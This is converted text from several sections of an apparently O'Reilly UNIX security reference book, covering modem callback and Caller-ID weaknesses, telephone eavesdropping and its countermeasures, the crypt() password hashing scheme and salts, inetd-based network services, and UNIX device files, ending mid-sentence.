Some callback systems attempt to get around this problem by waiting for a dial tone. Unfortunately,<br />

these modems can be fooled by an attacker who simply plays a recording of a dial tone over the open<br />

line.<br />

The only way to foil an attacker who is attempting this kind of trick is to have two sets of modems - one<br />

set for dialing in, and one set for dialing out. To make this work, you should have the telephone company<br />

install the lines so that the incoming lines cannot be used to dial out, and the outgoing lines have no<br />

telephone number for dialing in. This setup costs more than a regular line, but adds an extra measure of<br />

security for your phone connections.<br />

Note that even with these precautions, there are other ways to subvert a calback. For example, someone<br />

could install call-forwarding on the called-back number and reroute the call through the switches at the<br />

phone company. Callback schemes can enhance your system's overall security, but you should not<br />

depend on them as your only means of protection.<br />

14.4.3 Caller-ID (CNID)<br />

In many areas, you can purchase an additional telephone service called Caller-ID. As its name implies,<br />

Caller-ID identifies the phone number of each incoming telephone call. The phone number is usually<br />

displayed on a small box next to the telephone when the phone starts ringing. (Note that this feature may<br />

not be available to you if you own your own PBX or switch.)<br />

The telephone company sells Caller-ID on the virtues of its privacy and security: by knowing the phone<br />

number of an incoming call, you can make the decision as to whether or not you wish to answer it.<br />

Caller-ID can also be used with computers. Several modem makers now support Caller-ID directly. With<br />

one of these modems, you can program the modem to send the telephone number of the calling<br />

instrument to the computer. You can then write custom software to limit incoming calls to a specified list<br />

of phone numbers, or to only allow certain users to use certain phones.<br />

The telephone company's Integrated Services Digital Network (ISDN[3]) digital phone service also<br />

provides the phone number of the caller through a similar service called Automatic Number<br />

Identification (ANI). This service is available to many corporate 800-number subscribers. ISDN offers<br />

yet another service called Restricted Calling Groups, which allows you to specify a list of phone numbers<br />

that are allowed to call your telephone number. All other callers are blocked.<br />

[3] In many areas of the country, ISDN still stands for "Interesting Services Doing<br />

Nothing."<br />

Advanced telephone services such as these are only as secure as the underlying telephone network<br />

infrastructure: if an attacker managed to break into the telephone company's computers, that attacker<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_04.htm (3 of 6) [2002-04-12 10:45:11]


[Chapter 14] 14.4 Modems and <strong>Sec</strong>urity<br />

could reprogram them to display incorrect numbers on the Caller-ID display, or to bypass Restricted<br />

Calling Groups. Although there are no officially acknowledged cases of such attacks, the possibility<br />

exists, and many credible but "informal" accounts of such incidents have been recounted.<br />

14.4.4 Protecting Against Eavesdropping<br />

Modems that are not adaptive are very susceptible to eavesdropping and wiretapping. Non-adaptive<br />

modems include data modems that are slower than 9600 baud and most fax modems. The conversations<br />

between these modems can be recorded with a high-quality audio tape and played into a matching unit at<br />

a later point in time, or the telephone line can simply be bridged and fed into a separate surveillance<br />

modem. Cellular telephone modems are even easier to tap, as their communications are broadcast and<br />

readily intercepted by anyone.<br />

Adaptive modems are less susceptible to eavesdropping with ordinary equipment, although even their<br />

communications may be intercepted using moderately sophisticated techniques.<br />

How common is electronic eavesdropping? No one can say with certainty. As Whitfield Diffie points<br />

out, for electronic eavesdropping to be effective, the target must be unaware of its existence or take no<br />

precautions. Unfortunately, such a scenario is often the case.<br />

14.4.4.1 Kinds of eavesdropping<br />

There are basically four different places where a telephone conversation can be tapped:<br />

●<br />

●<br />

●<br />

●<br />

At your premises. Using a remote extension, an attacker can place a second telephone or a tape<br />

recorder in parallel with your existing instruments. Accessible wiring closets with standard<br />

punch-down blocks for phone routing make such interception trivial to accomplish and difficult to<br />

locate by simple inspection. An inductive tap can also be used, and this requires no alternation to<br />

the wiring.<br />

On the wire between your premises and the central office. An attacker can splice monitoring<br />

equipment along the wire that gives you telephone service. In many cities, especially older ones,<br />

many splices already exist, and a simple pair of wires can literally go all over town and into other<br />

people's homes and offices without anybody's knowledge.<br />

At the phone company's central office. A tap can be placed on your line by employees at the<br />

telephone company, operating in either an official or an unofficial capacity. If the tap is<br />

programmed into the telephone switch itself, it may be almost impossible to detect its presence.[4]<br />

Hackers who penetrate the phone switches can also install taps in this manner (and, allegedly, have<br />

done so).<br />

[4] Under the terms of the 1994 Communications Assistance to Law Enforcement Act<br />

(formerly called the Digital Telephony Act), telephone providers have a legal<br />

obligation to make it impossible to detect a lawfully ordered wiretap.<br />

Along a wireless transmission link. If your telephone call is routed over a satellite or a<br />

microwave link, a skillful attacker can intercept and decode that radio transmission.<br />

Who might be tapping your telephone lines? Here are some possibilities:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_04.htm (4 of 6) [2002-04-12 10:45:11]


[Chapter 14] 14.4 Modems and <strong>Sec</strong>urity<br />

●<br />

●<br />

●<br />

A spouse or coworker. A surprising amount of covert monitoring takes place in the home or<br />

office by those we trust. Sometimes the monitoring is harmless or playful; other times, there are<br />

sinister motives.<br />

Industrial spies. A tap may be placed by a spy or a business competitor seeking proprietary<br />

corporate information. According to Current and Future Danger, a 1995 publication by the<br />

Computer <strong>Sec</strong>urity Institute, the monthly theft of proprietary data increased 260% from 1988 to<br />

1993, and over 30% of those cases included foreign involvement. As almost 75% of businesses<br />

have some proprietary information of significant competitive value, the potential for such losses<br />

should be a concern.<br />

Law enforcement. In 1994, U.S. law enforcement officials obtained court orders to conduct 1,154<br />

wiretaps, according to the Administrative Office of the United States Courts. A large majority of<br />

those intercepts, 76%, were the result of ongoing drug investigations. Wiretaps are also used to<br />

conduct investigations in terrorism, white-collar crime, and organized crime.<br />

Law enforcement agents may also conduct illegal wiretaps - wiretaps for which the officers have<br />

no warrant. Although information obtained from such a wiretap cannot be used in court as<br />

evidence, it can be used to obtain a legal wiretap or even a search warrant. (In the late 1980s and<br />

early 1990s, there was an explosion in the use of unnamed, paid informants by law enforcement<br />

agencies in the United States.) Information could also be used for extralegal purposes, such as<br />

threats, intimidation, or blackmail.<br />

14.4.4.2 Protection against eavesdropping<br />

There are several measures that you can take against electronic eavesdropping, with varying degrees of<br />

effectiveness:<br />

●<br />

●<br />

●<br />

Visually inspect your telephone line.<br />

Look for spliced wires, taps, or boxes that you cannot understand. Most eavesdropping by people<br />

who are not professionals is very easy to detect.<br />

Have your telephone line electronically "swept."<br />

Using a device called a signal reflectometer, a trained technician can electronically detect any<br />

splices or junctions on your telephone line. Junctions may or may not be evidence of taps; in some<br />

sections of the country, many telephone pairs have multiple arms that take them into several<br />

different neighborhoods. If you do choose to sweep your line, you should do so on a regular basis.<br />

Detecting a change in a telephone line that has been watched over time is easier than looking at a<br />

line one time only and determining if the line has a tap on it.<br />

Sweeping may not detect certain kinds of taps, such as digital taps conducted by the telephone<br />

company for law enforcement agencies or other organizations, nor will it detect inductive taps.<br />

Use cryptography.<br />

A few years ago, cryptographic telephones or modems cost more than $1,000 and were only<br />

available to certain purchasers. Today, there are devices costing less than $300 that fit between a<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_04.htm (5 of 6) [2002-04-12 10:45:11]


[Chapter 14] 14.4 Modems and <strong>Sec</strong>urity<br />

computer and a modem and create a cryptographically secure line. Most of these systems are based<br />

on private key cryptography and require that the system operator distribute a different key to each<br />

user. In practice, such restrictions pose no problem for most organizations. But there is also a<br />

growing number of public key systems, which offer simple-to-use security that is still of the<br />

highest caliber. There are also many affordable modems that include built-in encryption and which<br />

require no special unit to work.<br />

14.3 The RS-232 Serial<br />

Protocol<br />

14.5 Modems and <strong>UNIX</strong><br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_04.htm (6 of 6) [2002-04-12 10:45:11]


[Chapter 8] 8.6 The <strong>UNIX</strong> Encrypted Password System<br />

Chapter 8<br />

Defending Your Accounts<br />

8.6 The <strong>UNIX</strong> Encrypted Password System<br />

When <strong>UNIX</strong> requests your password, it needs some way of determining that the password you type is the<br />

correct one. Many early computer systems (and quite a few still around today!) kept the passwords for all<br />

of their accounts plainly visible in a so-called "password file" that really contained the passwords. Under<br />

normal circumstances, the system protected the passwords so that they could be accessed only by<br />

privileged users and operating system utilities. But through accident, programming error, or deliberate<br />

act, the contents of the password file almost invariably become available to unprivileged users. This<br />

scenario is illustrated in the following remembrance:<br />

Perhaps the most memorable such occasion occurred in the early 1960s when a system<br />

administrator on the CTSS system at MIT was editing the password file and another system<br />

administrator was editing the daily message that is printed on everyone's terminal on login.<br />

Due to a software design error, the temporary editor files of the two users were interchanged<br />

and thus, for a time, the password file was printed on every terminal when it was logged in.<br />

- Robert Morris and Ken Thompson, Password <strong>Sec</strong>urity: A Case History<br />

The real danger posed by such systems, wrote Morris and Thompson, is not that software problems will<br />

cause a recurrence of this event, but that people can make copies of the password file and purloin them<br />

without the knowledge of the system administrator. For example, if the password file is saved on backup<br />

tapes, then those backups must be kept in a physically secure place. If a backup tape is stolen, then<br />

everybody's password must be changed.<br />

<strong>UNIX</strong> avoids this problem by not keeping actual passwords anywhere on the system. Instead, <strong>UNIX</strong><br />

stores a value that is generated by using the password to encrypt a block of zero bits with a one-way<br />

function called crypt( ); the result of the calculation is (usually) stored in the file /etc/passwd. When you<br />

try to log in, the program / bin/login does not actually decrypt your password. Instead, /bin/login takes<br />

the password that you typed, uses it to transform another block of zeros, and compares the newly<br />

transformed block with the block stored in the /etc/passwd file. If the two encrypted results match, the<br />

system lets you in.<br />

The security of this approach rests upon the strength of the encryption algorithm and the difficulty of<br />

guessing the user's password. To date, the crypt () algorithm has proven highly resistant to attacks.<br />

Unfortunately, users have a habit of picking easy-to-guess passwords (see <strong>Sec</strong>tion 3.6.1, "Bad<br />

Passwords: Open Doors"), which creates the need for shadow password files.<br />

NOTE: Don't confuse the crypt ( ) algorithm with the crypt encryption program. The crypt<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_06.htm (1 of 4) [2002-04-12 10:45:11]


[Chapter 8] 8.6 The <strong>UNIX</strong> Encrypted Password System<br />

program uses a different encryption system from crypt ( ) and is very easy to break. See<br />

Chapter 6, Cryptography, for more details.<br />

8.6.1 The crypt() Algorithm<br />

The algorithm that crypt ( ) uses is based on the Data Encryption Standard (DES) of the National Institute<br />

of Standards and Technology (NIST). In normal operation, DES uses a 56-bit key (eight 7-bit ASCII<br />

characters, for instance) to encrypt blocks of original text, or clear text, that are 64 bits in length. The<br />

resulting 64-bit blocks of encrypted text, or ciphertext, cannot easily be decrypted to the original clear<br />

text without knowing the original 56-bit key.<br />

The <strong>UNIX</strong> crypt ( ) function takes the user's password as the encryption key and uses it to encrypt a<br />

64-bit block of zeros. The resulting 64-bit block of cipher text is then encrypted again with the user's<br />

password; the process is repeated a total of 25 times. The final 64 bits are unpacked into a string of 11<br />

printable characters that are stored in the /etc/passwd file.[8]<br />

[8] Each of the 11 characters holds six bits of the result, represented as one of 64 characters<br />

in the set ".", "/", 0-9, A-Z, a-z, in that order. Thus, the value 0 is represented as ".", and 32<br />

is the letter "U".<br />

Although the source code to crypt ( ) is readily available, no technique has been discovered (and<br />

publicized) to translate the encrypted password back into the original password. Such reverse translation<br />

may not even be possible. As a result, the only known way to defeat <strong>UNIX</strong> password security is via a<br />

brute-force attack (see the note below), or by a dictionary attack. A dictionary attack is conducted by<br />

choosing likely passwords, as from a dictionary, encrypting them, and comparing the results with the<br />

value stored in /etc/passwd. This approach to breaking a cryptographic cipher is also called a key search<br />

or password cracking.<br />

Robert Morris and Ken Thompson designed crypt ( ) to make a key search computationally expensive,<br />

and therefore too difficult to be successful. At the time, software implementations of DES were usually<br />

slow; iterating the encryption process 25 times made the process of encrypting a single password 25<br />

times slower still. On the original PDP-11 processors, upon which <strong>UNIX</strong> was designed, nearly a full<br />

second of computer time was required to encrypt a single password. To eliminate the possibility of using<br />

DES hardware encryption chips, which were a thousand times faster than software running on a PDP-11,<br />

Morris and Thompson modified the DES tables used by their software implementation, rendering the two<br />

incompatible. The same modification also served to prevent a bad guy from simply pre-encrypting an<br />

entire dictionary and storing it.<br />

What was the modification? Morris and Thompson added a bit of salt, as we'll describe below.<br />

NOTE: There is no published or known method to easily decrypt DES-encrypted text<br />

without knowing the key.[9] However, there have been many advances in hardware design<br />

since the DES was developed. Although there is no known software algorithm to "break" the<br />

encryption, you can build a highly parallel, special-purpose DES decryption engine that can<br />

try all possible keys in a matter of hours.<br />

The cost of such a machine is estimated at several millions of dollars. It would work by<br />

using a brute-force attack of trying all possible keys until intelligible text is produced.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_06.htm (2 of 4) [2002-04-12 10:45:11]


[Chapter 8] 8.6 The <strong>UNIX</strong> Encrypted Password System<br />

Several million dollars is well within the budget of most governments, and a significant<br />

number of large corporations. A similar machine for finding <strong>UNIX</strong> passwords is feasible.<br />

Thus, passwords should not be considered as completely "unbreakable."<br />

8.6.2 What Is Salt?<br />

As table salt adds zest to popcorn, the salt that Morris and Thompson sprinkled into the DES algorithm<br />

added a little more spice and variety. The DES salt is a 12-bit number, between 0 and 4095, which<br />

slightly changes the result of the DES function. Each of the 4096 different salts makes a password<br />

encrypt a different way.<br />

When you change your password, the /bin/passwd program selects a salt based on the time of day. The<br />

salt is converted into a two-character string and is stored in the /etc/passwd file along with the encrypted<br />

"password."[10] In this manner, when you type your password at login time, the same salt is used again.<br />

<strong>UNIX</strong> stores the salt as the first two characters of the encrypted password.<br />

[10] By now, you know that what is stored in the /etc/passwd file is not really the encrypted<br />

password. However, everyone calls it that, and we will do the same from here on.<br />

Otherwise, we'll need to keep typing "the superencrypted block of zeros that is used to<br />

verify the user's password" everywhere in the book, filling many extra pages and<br />

contributing to the premature demise of yet more trees.<br />

Table 8.2 shows how a few different words encrypt with different salts.<br />

Table 8.2: Passwords and Salts<br />

Password Salt Encrypted Password<br />

nutmeg Mi MiqkFWCm1fNJI<br />

ellen1 ri ri79KNd7V6.Sk<br />

Sharon ./ ./2aN7ysff3qM<br />

norahs am amfIADT2iqjAf<br />

norahs 7a 7azfT5tIdyh0I<br />

Notice that the last password, norahs, was encrypted two different ways with two different salts.<br />

Having a salt means that the same password can encrypt in 4096 different ways. This makes it much<br />

harder for an attacker to build a reverse dictionary for translated encrypted passwords back into their<br />

unencrypted form: to build a reverse dictionary of 100,000 words, an attacker would need to have<br />

409,600,000 entries. As a side effect, the salt makes it possible for a user to have the same password on a<br />

number of different computers and to keep this fact a secret (usually), even from somebody who has<br />

access to the /etc/passwd files on all of those computers; two systems would not likely assign the same<br />

salt to the user, thus ensuring that the encrypted password field is different.[11]<br />

[11] This case occurs only when the user actually types in his or her password on the second<br />

computer. Unfortunately, in practice system administrators commonly cut and paste<br />

/etc/passwd entries from one computer to another when they build accounts for users on new<br />

computers. As a result, others can easily tell when a user has the same password on more<br />

than one system.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_06.htm (3 of 4) [2002-04-12 10:45:11]


[Chapter 8] 8.6 The <strong>UNIX</strong> Encrypted Password System<br />

8.6.3 What the Salt Doesn't Do<br />

Unfortunately, salt is not a cure-all. Although it makes the attacker's job of building a database of all<br />

encrypted passwords more difficult, it doesn't increase the amount of time required to search for a single<br />

user's password.<br />

Another problem with the salt is that it is limited, by design, to one of 4096 different possibilities. In the<br />

20 years since passwords have been salted, computers have become faster, hard disks have become<br />

bigger, and you can now put 4, 10, or even 20 gigabytes of information onto a single tape drive. As a<br />

result, password files have become once again a point of vulnerability, and <strong>UNIX</strong> vendors are<br />

increasingly turning to shadow password files and other techniques to fight password-guessing attacks.<br />

Yet another problem is that the salt is selected based on the time of day, which makes some salts more<br />

likely than others.<br />

8.6.4 Crypt16() and Other Algorithms<br />

Some <strong>UNIX</strong> operating systems, such as HP-UX, Ultrix, and BSD 4.4 can be configured to use a different<br />

crypt ( ) system library that uses 16 or more significant characters in each password. The algorithm may<br />

also use a significantly larger salt. This algorithm is often referred to as bigcrypt() or crypt16 (). You<br />

should check your user documentation to see if this algorithm is an option available on your system. If<br />

so, you should consider using it. The advantage is that these systems will have more secure passwords.<br />

The disadvantage is that the encrypted passwords on these systems will not be compatible with the<br />

encrypted passwords on other systems.<br />

8.5 Protecting the root<br />

Account<br />

8.7 One-Time Passwords<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_06.htm (4 of 4) [2002-04-12 10:45:11]


[Chapter 17] TCP/IP Services<br />

Chapter 17<br />

17. TCP/IP Services<br />

Contents:<br />

Understanding <strong>UNIX</strong> <strong>Internet</strong> Servers<br />

Controlling Access to Servers<br />

Primary <strong>UNIX</strong> Network Services<br />

<strong>Sec</strong>urity Implications of Network Services<br />

Monitoring Your Network with netstat<br />

Network Scanning<br />

Summary<br />

Connecting a <strong>UNIX</strong> computer to the <strong>Internet</strong> is not an action that should be taken lightly. Although the<br />

TCP/IP protocol suite and the <strong>UNIX</strong> operating system themselves have few inherent security problems,<br />

many of the problems that do exist have a strange way of showing themselves when computers running<br />

the <strong>UNIX</strong> operating system are put on the global network.<br />

The reason for caution has a lot to do with the flexibility of both <strong>UNIX</strong> and the <strong>Internet</strong>. A network<br />

connection gives users on the network dozens of different ways to form connections with your computer:<br />

they can send it mail, they can access a WWW server, and they can look up the names and addresses of<br />

your users. Unfortunately, each of these services can contain potential security holes, both as the result of<br />

bugs, and because of fundamental shortcomings in the services themselves.<br />

Over the years many security problems have been discovered in network services, and workable solutions<br />

have been found. Unfortunately, some <strong>UNIX</strong> vendors have been slow to incorporate these security-related<br />

fixes into their standard offerings. If you are the system manager of any <strong>UNIX</strong> computer that is connected<br />

to a network, you must therefore be aware of the security failings of your own computer, and take<br />

appropriate measures to counteract them. To do so, you first need to understand how the <strong>UNIX</strong> operating<br />

system works with the <strong>Internet</strong>.<br />

This chapter is not a definitive description of the TCP/IP services offered by <strong>UNIX</strong>. Instead, it presents a<br />

brief introduction to the various services, and describes security-related concerns of each. For a more<br />

definitive discussion, we recommend the following books:<br />

●<br />

●<br />

Building <strong>Internet</strong> Firewalls, by D. Brent Chapman and Elizabeth D. Zwicky (<strong>O'Reilly</strong> &<br />

Associates, 1995).<br />

Managing <strong>Internet</strong> Information Services,by Cricket Liu, Jerry Peek, Russ Jones, Bryan Buus, and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_01.htm (1 of 5) [2002-04-12 10:45:12]


[Chapter 17] TCP/IP Services<br />

●<br />

●<br />

●<br />

Adrian Nye (<strong>O'Reilly</strong> & Associates, 1994).<br />

DNS and BIND, by Paul Albitz and Cricket Liu (<strong>O'Reilly</strong> & Associates, 1992).<br />

sendmail, by Bryan Costales, with Eric Allman and Neil Rickert (<strong>O'Reilly</strong> & Associates, 1993).<br />

<strong>UNIX</strong> Network Programming, by W. Richard Stevens (Prentice Hall, 1990).<br />

17.1 Understanding <strong>UNIX</strong> <strong>Internet</strong> Servers<br />

Most <strong>UNIX</strong> network services are provided by individual programs called servers. For a server to operate,<br />

it must be assigned a protocol (TCP or UDP), be assigned a port number, and be started when the system<br />

boots or as needed, as we'll describe in "Starting the Servers" below.<br />

17.1.1 The /etc/services File<br />

The /etc/services file is a relational database file. Each line of the /etc/services file consists of a service<br />

name, a network port number, a protocol name, and a list of aliases. A rather extensive list of <strong>Internet</strong><br />

services, including their uses on <strong>UNIX</strong> systems, their security implications, and our recommendations as<br />

to whether or not you should run them, appears in Appendix G, Table of IP Services.<br />

The /etc/services file is referenced by both <strong>Internet</strong> client programs and servers. The information in the<br />

/etc/services file comes from <strong>Internet</strong> RFCs[1] and other sources. Some of the services listed in the<br />

/etc/services file are no longer in widespread use; nevertheless, their names still appear in the file to<br />

prevent the accidental reassignment of their ports in the event that the services are still used somewhere on<br />

the global network.<br />

[1] RFC stands for Request For Comment. The RFCs describe many of the actual standards,<br />

proposed standards, and operational characteristics of the <strong>Internet</strong>. There are many online<br />

sources for obtaining the RFCs.<br />

The following is an excerpt from the /etc/services file that specifies the Telnet, SMTP, and Network Time<br />

Protocol (NTP) services:<br />

# /etc/services<br />

#<br />

telnet 23 /tcp<br />

smtp 25 /tcp mail<br />

time 37 /udp timeserver<br />

...<br />

<strong>UNIX</strong> servers should determine their port numbers by looking up each port in the /etc/services file using<br />

the <strong>UNIX</strong> system call getservicebyname(). The /etc/services file can be supplemented or replaced by<br />

distributed database systems such as NIS, NIS+, Netinfo, or DCE Most of these systems patch the<br />

system's getservicebyname() system call, so that they are transparent to the application.<br />

Trusted Ports<br />

Ports in the range 0 to 1023 are sometimes referred to as trusted ports. On <strong>UNIX</strong>, these ports are restricted<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_01.htm (2 of 5) [2002-04-12 10:45:12]


[Chapter 17] TCP/IP Services<br />

to the superuser; a program must be running as root to listen to a trusted port or to originate a connection<br />

from any of these port numbers. (Note that any user can connect to a trusted port.)<br />

The concept of trusted ports is intended to prevent a regular user from obtaining privileged information.<br />

For example, if a regular user could write a program that listened to port 23, that program could<br />

masquerade as a Telnet server, receiving connections from unsuspecting users, and obtain their passwords.<br />

This idea of trusted ports is a <strong>UNIX</strong> convention. It is not part of the <strong>Internet</strong> standard, and manufacturers<br />

are not bound to observe this protocol. It is simply the way that the designers of <strong>UNIX</strong> network services<br />

decided to approach the problem.<br />

Thus, trusted ports are not very trustworthy. Using a non-<strong>UNIX</strong>machine, such as an IBM PC with an<br />

Ethernet board in place, it is possible to spoof <strong>UNIX</strong> network software by sending packets from, or<br />

listening to, low-numbered trusted ports.<br />

Some programmers bypass this system call and simply hard-code the service number into their programs.<br />

Thus, if you make a change to a program's port number in the /etc/services file, the server may or may not<br />

change the port to which it is listening. This can result in significant problems if a change is necessary,<br />

although well-known services seldom change their ports.<br />

17.1.2 Starting the Servers<br />

There are fundamentally two kinds of <strong>UNIX</strong> servers:<br />

●<br />

●<br />

Servers that are always running. These servers are started automatically from the /etc/rc* files when<br />

the operating system starts up.[2] Servers started at boot time are usually the servers that should<br />

provide rapid responses to user requests, must handle many network requests from a single server<br />

process, or both. Servers in this category include nfsd (Network Filesystem daemon) and sendmail.<br />

[2] On System V-derived operating systems, such as Solaris 2.x, these servers are<br />

usually started by an entry in a file located inside the /etc/rc2.d/ directory.<br />

Servers that are run only when needed. These servers are usually started from inetd, the <strong>UNIX</strong><br />

"<strong>Internet</strong>" daemon. inetd is a flexible program that can listen to dozens of <strong>Internet</strong> ports and<br />

automatically start the appropriate daemon as needed. Servers started by inetd include popper (Post<br />

Office Protocol daemon) and fingerd (the finger daemon).<br />

Servers that are always running are usually started by a command in the /etc/rc* files. For example, the<br />

lines in the /etc/rc file that start up the Simple Mail Transfer Protocol (SMTP) server looks like this:<br />

if [ -f /usr/lib/sendmail -a -f /etc/sendmail/sendmail.cf ]; then<br />

/usr/lib/sendmail -bd -q1h && (echo -n ' sendmail') > /dev/console<br />

fi<br />

This example checks for the existence of /usr/lib/sendmail and the program's control file,<br />

/etc/sendmail/sendmail.cf. If the two files exist, /etc/rc runs the sendmail program and prints the word<br />

"sendmail" on the system console. After the program is running, sendmail will bind to TCP/IP port<br />

number 25 and listen for connections.[3]<br />

[3] The option -bd makes the sendmail program "be a daemon" while the option -q1h causes<br />

the program to process the mail queue every hour.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_01.htm (3 of 5) [2002-04-12 10:45:12]


[Chapter 17] TCP/IP Services<br />

Each time the sendmail program receives a connection, it uses the fork()system call to create a new<br />

process to handle that connection. The original sendmail process then continues listening for new<br />

connections.<br />

17.1.3 The /etc/inetd Program<br />

The first version of <strong>UNIX</strong> to support the <strong>Internet</strong>, BSD 4.2, set a different server program running for<br />

every network service.[4] As the number of services grew in the mid-1980s, <strong>UNIX</strong> systems started having<br />

more and more server programs sleeping in the background, waiting for network connections. Although<br />

the servers were sleeping, they nevertheless consumed valuable system resources such as process table<br />

entries and swap space. Eventually, a single program called /etc/inetd (the <strong>Internet</strong> daemon) was<br />

developed, which listened on many network ports at a time and ran the appropriate TCP-based or<br />

UDP-based server on demand when a connection was received.<br />

[4] BSD 4.1a was an early test release of <strong>UNIX</strong> with TCP/IP support. BSD 4.2, released in<br />

September 1983, was the first non-test release with TCP/IP support.<br />

inetd is run at boot time as part of the start-up procedure. When it starts execution, it examines the<br />

contents of the /etc/inetd.conf file to determine which network services it is supposed to manage. inetd<br />

uses the bind() call to attach itself to many network ports and then uses the select() call to cause<br />

notification when a connection is made on any of the ports.<br />

A sample inetd.conf file might look like this:<br />

# @(#)inetd.conf 1.1 87/08/12 3.2/4.3NFSSRC<br />

#<br />

# <strong>Internet</strong> server configuration database<br />

#<br />

ftp stream tcp nowait root /usr/etc/ftpd ftpd<br />

telnet stream tcp nowait root /usr/etc/telnetd telnetd<br />

shell stream tcp nowait root /usr/etc/rshd rshd<br />

login stream tcp nowait root /usr/etc/rlogind rlogind<br />

exec stream tcp nowait root /usr/etc/rexecd rexecd<br />

uucp stream tcp nowait uucp /usr/etc/uucpd uucpd<br />

finger stream tcp nowait nobody /usr/etc/fingerd fingerd<br />

tftp dgram udp wait nobody /usr/etc/tftpd tftpd<br />

comsat dgram udp wait root /usr/etc/comsat comsat<br />

talk dgram udp wait root /usr/etc/talkd talkd<br />

ntalk dgram udp wait root /usr/etc/ntalkd ntalkd<br />

echo stream tcp nowait root internal<br />

discard stream tcp nowait root internal<br />

chargen stream tcp nowait root internal<br />

daytime stream tcp nowait root internal<br />

time stream tcp nowait root internal<br />

echo dgram udp wait root internal<br />

discard dgram udp wait root internal<br />

chargen dgram udp wait root internal<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_01.htm (4 of 5) [2002-04-12 10:45:12]


[Chapter 17] TCP/IP Services<br />

daytime dgram udp wait root internal<br />

time dgram udp wait root internal<br />

Each line contains at least six fields, separated by spaces or tabs:<br />

Service name<br />

The service name that appears in the /etc/services file. inetd uses this name to determine which port<br />

number it should listen to.<br />

Socket type<br />

Whether the service expects to communicate via a stream or on a datagram basis.<br />

Protocol type<br />

Whether the service expects to use TCP- or UDP-based communications. TCP is used with stream<br />

sockets, while UDP is used with dgram, or datagrams.<br />

Wait/nowait<br />

User<br />

If the entry is "wait," the server is expected to process all subsequent connections received on the<br />

socket. If "nowait" is specified, inetd will fork() and exec()a new server process for each additional<br />

datagram or connection request received. Most UDP services are wait, while most TCP services are<br />

nowait, although this is not a firm rule. Although some man pages indicate that this field is only<br />

used with datagram sockets, the field is actually interpreted for all services.<br />

Specifies the UID that the server process is to be run as. This can be root (UID 0), daemon (UID 1),<br />

nobody (often UID -2 or 65534), or an actual user of your system. This field allows server processes<br />

to be run with fewer permissions than root, to minimize the damage that could be done if a security<br />

hole is discovered in a server program.<br />

Command name and arguments<br />

The remaining arguments specify the command name to execute and the arguments that the<br />

command is passed, starting with argv[0].<br />

Some services, like echo, time, and discard, are listed as "internal." These services are fairly trivial, and<br />

they are handled internally by inetd rather than requiring a special program to be run. Although these<br />

services are useful for testing, they can also be used for denial of service attacks. You should disable them.<br />

You should routinely check the entries in the /etc/inetd.conf file and verify that you understand why each<br />

of the services in the file is being offered to the <strong>Internet</strong>. Sometimes, when attackers break into systems,<br />

they create new services to make future break-ins easier. If you cannot explain why a service is being<br />

offered at your site, you may wish to disable it until you know what purpose it serves.<br />

16.5 Summary 17.2 Controlling Access to<br />

Servers<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_01.htm (5 of 5) [2002-04-12 10:45:12]


[Chapter 5] 5.6 Device Files<br />

5.6 Device Files<br />

Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

Computer systems usually have peripheral devices attached to them. These devices may be involved with I/O<br />

(terminals, printers, modems); they may involve mass storage (disks, tapes); and they may have other specialized<br />

functions. The <strong>UNIX</strong> paradigm for devices is to treat each one as a file, some with special characteristics.<br />

<strong>UNIX</strong> devices are represented as inodes, identical to files. The inodes represent either a character device or a block<br />

device (described in the sidebar). Each device is also designated by a major device number, indicating the type of<br />

device, and a minor device number, indicating which one of many similar devices the inode represents. For instance,<br />

the partitions of a physical disk will all have the same major device number, but different minor device numbers. For<br />

a serial card, the minor device number may represent which port number is in use. When a program reads from or<br />

writes to a device file, the kernel turns the request into an I/O operation with the appropriate device, using the<br />

major/minor device numbers as parameters to indicate which device to access.<br />

Block Vs. Character Devices<br />

Most devices in <strong>UNIX</strong> are referenced as character devices. These are also known as raw devices. The reason for the<br />

name "raw device" is because that is what you get - raw access to the device. You must make your read and write<br />

calls to the device file in the natural transfer units of the device. Thus, you probably read and write single characters<br />

at a time to a terminal device, but you need to read and write sectors to a disk device. Attempts to read fewer (or<br />

more) bytes than the natural block size results in an error, because the raw device doesn't work that way.<br />

When accessing the filesystem, we often want to read or write only the next few bytes of a file at a time. If we used<br />

the raw device, it would mean that to write a few bytes to a file, we would need to read in the whole sector off disk<br />

containing those bytes, modify the ones we want to write, and then write the whole sector back out. Now consider<br />

every user doing that as they update each file. That would be a lot of disk traffic!<br />

The solution is to make efficient use of caching. Block devices are cached versions of character devices. When we<br />

make reference to a few bytes of the block device, the kernel reads the corresponding sector into a buffer in memory,<br />

and then copies the characters out of the buffer that we wanted. The next time we reference the same sector, to read<br />

from or write to, the access goes to the cached version in memory. If we have enough memory, most of the files we<br />

will access can all be kept in buffers, resulting in much better performance.<br />

There is a drawback to block devices, however. If the system crashes before modified buffers get written back out to<br />

